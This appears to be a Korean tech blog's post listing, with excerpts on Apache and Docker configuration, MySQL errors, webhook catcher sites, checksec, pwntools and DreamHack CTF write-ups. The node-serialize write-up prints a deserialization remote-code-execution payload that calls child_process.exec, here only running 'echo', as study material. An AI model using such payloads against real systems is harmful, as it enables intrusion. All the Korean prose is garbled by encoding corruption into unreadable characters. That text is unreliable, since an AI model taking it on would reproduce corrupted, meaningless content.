๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
  • Tried. Failed. Logged.
728x90

์ „์ฒด ๊ธ€720

์•„ํŒŒ์น˜ - ๋„๋ฉ”์ธ์œผ๋กœ๋งŒ ์ ‘์† ํ—ˆ์šฉํ•˜๊ฒŒ(ip๋Š” ์ฐจ๋‹จ) /etc/apache2/apache2.conf #๋„๋ฉ”์ธ ์ ‘์† DocumentRoot "/var/www/html" ServerName mydomain.com #ip์ ‘์† DocumentRoot "/var/www/invalid" ์ถœ์ฒ˜: https://kldp.org/node/154891 Apache ๋„๋ฉ”์ธ์œผ๋กœ๋งŒ ์ ‘์† ๋˜๊ฒŒ๋” ํ• ๋ ค๊ณ  ํ•ฉ๋‹ˆ๋‹ค (IP ์ ‘์†์€ ์ฐจ๋‹จ) | KLDP ์•ˆ๋…•ํ•˜์„ธ์š”. ์ œ๊ฐ€ ์‚ฌ์šฉํ•˜๋Š” ํ™˜๊ฒฝ์€ Apache-Weblogic์œผ๋กœ ๊ตฌ์„ฑ๋˜์—ˆ๊ณ , vhosts๋กœ ๋„๋ฉ”์ธ์„ ์•ฝ 200๊ฐœ ์ •๋„ ์‚ฌ์šฉ์ค‘์ž…๋‹ˆ๋‹ค. IP๋ฅผ ํ†ตํ•œ ์ ‘์†์€ ์ฐจ๋‹จ, ๋„๋ฉ”์ธ์„ ํ†ตํ•œ ์ ‘์†์€ ํ—ˆ์šฉํ• ๋ ค๊ณ  ํ•˜๋Š”๋ฐ, Apache์—์„œ ๊ด€๋ จ kldp.org https://feelcorp.tistory.com/entry/apache-%EB%8F%84%EB%A9%.. 2023. 4. 3.
์•„ํŒŒ์น˜ - ํŠน์ • ํ™•์žฅ์ž ์™ธ๋ถ€ ์ ‘์† ๊ธˆ์ง€ํ•˜๊ธฐ(.htaccess) ๊ธˆ์ง€ํ•  ํด๋”์— .htaccess ์ƒ์„ฑ .txt ํ™•์žฅ์ž ์ ‘์† ๊ธˆ์ง€ deny from all ์—ฌ๋Ÿฌ ๊ฐ€์ง€ ํ™•์žฅ์ž ์ ‘์† ๊ธˆ์ง€ Deny from all /etc/apache2/apache2.conf ์ˆ˜์ • Options FollowSymLinks AllowOverride all # ์ด๋ถ€๋ถ„ ์ˆ˜์ • 2023. 3. 31.
์•„ํŒŒ์น˜ - .php ํ™•์žฅ์ž ์—†์ด URL ์ ‘์†ํ•˜๊ธฐ vim /etc/apache2apache2.conf Options FollowSymLinks MultiViews AddType application/x-httpd-php .php .jsp Require all granted AllowOverride FileInfo sudo service apache2 restart ์ถœ์ฒ˜: http://www.dreamy.pe.kr/zbxe/CodeClip/3770316 [PHP] .php ํ™•์žฅ์ž ์—†์ด URL ์ ‘์†ํ•˜๊ธฐ https://mitny.github.io/articles/2018-02/url-without-php-extension Accessing url without .php extensionํ™˜๊ฒฝ: Ubuntu 16.04 LTSphp๋‚˜ ๋‹ค๋ฅธ ์–ธ์–ด๋กœ ํŽ˜์ด์ง€๋ฅผ ๋งŒ๋“ค์—ˆ์„.. 2023. 3. 31.
Docker - ์‹คํ–‰์ค‘์ธ ์ปจํ…Œ์ด๋„ˆ ํฌํŠธ ๋ฐ”์ธ๋”ฉํ•˜๊ธฐ & DNS ์„œ๋ฒ„ ์ฃผ์†Œ ์„ค์ • 1. ์‹คํ–‰ ์ค‘์ธ ์ปจํ…Œ์ด๋„ˆ ์ด๋ฏธ์ง€ํ™” docker commit [container id] [imageName]:[tagName] 2. ์ด๋ฏธ์ง€ํ™”ํ•œ ์ปจํ…Œ์ด๋„ˆ๋ฅผ run ํ•˜๋ฉด์„œ ํฌํŠธ ๋ฐ”์ธ๋”ฉ ์„ค์ • docker run -it -p [์™ธ๋ถ€port]:[์ปจํ…Œ์ด๋„ˆ ๋‚ด๋ถ€port] --name [์ปจํ…Œ์ด๋„ˆ ์ด๋ฆ„] [image id] /bin/bash #. run ํ•˜๋ฉด์„œ DNS ์„œ๋ฒ„ ์ฃผ์†Œ ์„ค์ • docker run --dns="8.8.8.8" ์ถœ์ฒ˜: http://blog.jaeil.wiki/docker-dns-setting/ Docker ์—์„œ DNS ์„ค์ • ๋ฐฉ๋ฒ• ์…ธ์—์„œ docker ๋ช…๋ น์–ด ์‹คํ–‰ ์‹œ inline ์œผ๋กœ ์ธ์ž ์ „๋‹ฌ docker run --dns="8.8.8.8" docker-compose.yaml ์— dns config ์ •์˜.. 2023. 3. 31.
MySQL - ๋„์ปค์—์„œ MySQL ์„œ๋ฒ„์— ์ ‘์†์ด ์•ˆ๋˜๋Š” ๊ฒฝ์šฐ[ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (13)] ๋กœ์ปฌ MySQL ์„œ๋ฒ„ ์ ‘์†์„ ์œ„ํ•œ /var/run/mysqld/mysqld.sock์— ์ ‘๊ทผ์ด ์•ˆ๋œ๋‹ค๋Š” ์˜ค๋ฅ˜ ๋ฉ”์‹œ์ง€ ์ด์œ ๋Š” mysqld ํด๋” ์ฃผ์ธ ์™ธ์—” ์•„๋ฌด๋„ ์ ‘๊ทผ์ด ์•ˆ๋˜๊ธฐ ๋•Œ๋ฌธ์ž„  chmod 755 /var/run/mysqldํด๋” ์ ‘๊ทผ ๊ถŒํ•œ์„ 755๋กœ ์„ค์ • 2023. 3. 31.
์•„ํŒŒ์น˜ - ๋„์ปค์—์„œ /var/log/apache2์— ์—๋Ÿฌ ๋กœ๊ทธ(error.log)๊ฐ€ ์•ˆ๋‚˜์˜ค๋Š” ๊ฒฝ์šฐ vim /etc/apache2/apache2.conf ์œ„์˜ ๋‚ด์šฉ์„ ์•„๋ž˜๋กœ ์ˆ˜์ • Errorlog ${APACHE_LOG_DIR}/error.log 2023. 3. 30.
์•„ํŒŒ์น˜ - ํŒŒ์ด์ฌ ํŒจํ‚ค์ง€ pip๋กœ ์„ค์น˜ sudo mkdir /var/www/.local sudo mkdir /var/www/.cache sudo chown www-data.www-data /var/www/.local sudo chown www-data.www-data /var/www/.cache sudo -H -u www-data pip install CoolProp www-data๋กœ /bin/sh ์—ฐ๊ฒฐ sudo su www-data -s /bin/sh ์ถœ์ฒ˜: https://stackoverflow.com/questions/39471295/how-to-install-python-package-for-global-use-by-all-users-incl-www-data How to install Python Package for global us.. 2023. 3. 29.
DreamHack - login-1 ํ’€์ด ๊ด€๋ฆฌ์ž ๋ ˆ๋ฒจ ์œ ์ € ์•„์ด๋”” ์ฐพ๊ธฐ http://host3.dreamhack.games:20947/user/1 = MAXRESETCOUNT: ์ด๋ ‡๊ฒŒ ์ž‘์„ฑํ–ˆ์œผ๋ฉด ์ด๋Ÿฐ ์ทจ์•ฝ์ ์€ ์—†์—ˆ์„ ๊ฒƒ. ์„œ๋ฒ„ ์—๋Ÿฌ 500์„ ์ด์šฉ ์‹ ๊ทœ ๊ณ„์ •์„ ๋งŒ๋“ค๊ฒŒ ๋˜๋ฉด resetCount ์˜์—ญ์—๋Š” NULL์ด ์ƒ๊ธฐ๊ฒŒ ๋˜๋ฉด์„œ ์•„๋ž˜์˜ resetCount = resetCount + 1 ๊ตฌ๋ฌธ์—์„œ ์˜ค๋ฅ˜๊ฐ€ ๋ฐœ์ƒํ•œ๋‹ค. ๊ฒฐ๊ตญ ๋ฆฌ์…‹ ์นด์šดํŠธ๋Š” ์ฆ๊ฐ€ ๋ชปํ•œ ์ฑ„ ์„œ๋ฒ„ ์ธก ์—๋Ÿฌ(500)๊ฐ€ ๋ฐœ์ƒํ•œ๋‹ค. updateSQL = "UPDATE user set resetCount = resetCount+1 where idx = ?" cur.execute(updateSQL, (str(user['idx']))) msg = f"Wrong BackupCode ! Left Count : .. 2023. 3. 27.
์›นํ›„ํฌ(webhook) ์‚ฌ์ดํŠธ(requestcatcher.com, webhook.site) https://requestcatcher.com/ Request Catcher — record HTTP requests, webhooks, API calls Request Catcher will create a subdomain on which you can test an application. All requests sent to any path on the subdomain are forwarded to your browser in real time. requestcatcher.com https://webhook.site/ Webhook.site - Test, process and transform emails and HTTP requests This URL received over {{ appCon.. 2023. 3. 27.
DreamHack - node-serialize (nodejs ์ง๋ ฌํ™” ์ทจ์•ฝ์ ) ํ’€์ด node-serialize ์ทจ์•ฝ์  ์˜ˆ์‹œ var serialize = require('node-serialize'); var x = { rce : function(){ require('child_process').exec('echo serialize exploited!', function(error, stdout, stderr) { console.log(stdout) }); }(), } serialize.serialize(x); var y = '{"username": "guest", "country": "Korea", "exec": "_$$ND_FUNC$$_function(){ require(\'child_process\').exec(\'echo unserialize exploited!\', functio.. 2023. 3. 27.
๋ฆฌ๋ฒ„์‹ฑ - ๋ฐ”์ด๋„ˆ๋ฆฌ์— ์„ค์ •๋œ ๋ณดํ˜ธ ๊ธฐ๋ฒ• ํ™•์ธ(checksec) checksec -f {ํŒŒ์ผ} RELRO(RELocation Read-Only): Read-Only ๊ถŒํ•œ ์„ค์ •์œผ๋กœ Write ๊ฐ€๋Šฅํ•œ์ง€ ์—ฌ๋ถ€ Stack Canary: Return Address Overwrite ์—ฌ๋ถ€ ํ™•์ธ Stack Canary๋Š” ์นด๋‚˜๋ฆฌ๋ฅผ ํ†ตํ•ด ์Šคํƒ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ๋ฅผ ๊ฐ์ง€ํ•œ๋‹ค. NX(No-eXecute): NX๋ฅผ ์šฐํšŒํ•  ์ˆ˜ ์žˆ๋Š” ๊ฐ€์žฅ ๋Œ€ํ‘œ์ ์ธ ๋ฐฉ๋ฒ•์€ ROP(Return Oriented Programming) NX(No-eXecute)๋Š” ์‰˜์ฝ”๋“œ ์‹คํ–‰์„ ๋ฐฉ์ง€ํ•œ๋‹ค. ASLR(Address Space Layout Randomization): ์‹คํ–‰๋  ๋•Œ๋งˆ๋‹ค ๋ฐ์ดํ„ฐ ์˜์—ญ(์Šคํƒ, ํž™, ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ ๋“ฑ)์˜ ์ฃผ์†Œ๋ฅผ ๋žœ๋ค์œผ๋กœ ๋ณ€๊ฒฝ Windows์šฉ checksec https://github.com/Wenzel/che.. 2023. 3. 26.
์‹œ์Šคํ…œ ๋ณด์•ˆ - pwntools pwntools๋Š” ๋ฆฌ๋ˆ…์Šค ํ™˜๊ฒฝ์—์„œ ์‹คํ–‰ ํ”„๋กœ๊ทธ๋žจ์˜ ์ต์Šคํ”Œ๋กœ์ž‡์„ ์ž‘์„ฑํ•˜๋„๋ก ๋„์›€์„ ์ฃผ๋Š” ํŒŒ์ด์ฌ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์ด๋‹ค. CTF์—์„œ๋„ ์œ ์šฉํ•˜๊ฒŒ ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ๋‹ค. pip ์„ค์น˜ ๋ช…๋ น์–ด python3 -m pip install --upgrade pwntools ์‚ฌ์šฉ ์˜ˆ์ œ >>> conn = remote('ftp.ubuntu.com',21) >>> conn.recvline() # doctest: +ELLIPSIS b'220 ...' >>> conn.send(b'USER anonymous\r\n') >>> conn.recvuntil(b' ', drop=True) b'331' >>> conn.recvline() b'Please specify the password.\r\n' >>> conn.close() nc(NetCat), .. 2023. 3. 25.
728x90